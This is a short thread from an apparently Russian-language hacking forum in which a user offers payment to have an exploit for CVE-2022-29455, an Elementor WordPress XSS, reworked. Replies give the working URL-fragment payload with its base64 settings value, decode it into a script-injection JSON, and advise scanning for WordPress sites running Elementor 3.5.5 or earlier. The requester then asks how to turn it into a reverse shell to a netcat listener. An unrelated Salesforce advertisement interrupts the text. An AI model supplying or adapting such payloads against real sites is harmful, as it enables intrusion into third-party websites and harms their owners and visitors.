сабж
от 300
от 300
CVE-2022-29455 доработать
- Автор темы Focus17
- Дата начала
- Статус
Что значит доработать?
- Автор темы
- Добавить закладку
- #3
зевести
exploit работает только на версии 3.5.5
тебе искать надо wp сайты на которых установлен elementor данной версии тогда будет работать
Код:
#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9
тебе искать надо wp сайты на которых установлен elementor данной версии тогда будет работать
Код:
#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9- Автор темы
- Добавить закладку
- #5
до <= 3.5.5 versions
не суть
после settings= вставлять нужно строку в base64
зашифрованная строка - eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9
расшифрованная - {"type":"null","html":"<script>alert('xss')</script>"}
Salesforce UK: The #1 AI CRM
Salesforce is the #1 AI CRM, helping companies become Agentic Enterprises where humans and agents drive success together through a unified AI, data, and Customer 360 platform.
site.com
- Автор темы
- Добавить закладку
- #7
ребят, подскажите какой пейлод, беру отсюда www.revshells.com, и куда вставлять чтобы прилетела сессия в неткат?
Бро, без обид... если тебе XSS надо "доработать". то за реверс шелл ты рановато взялся...
- Статус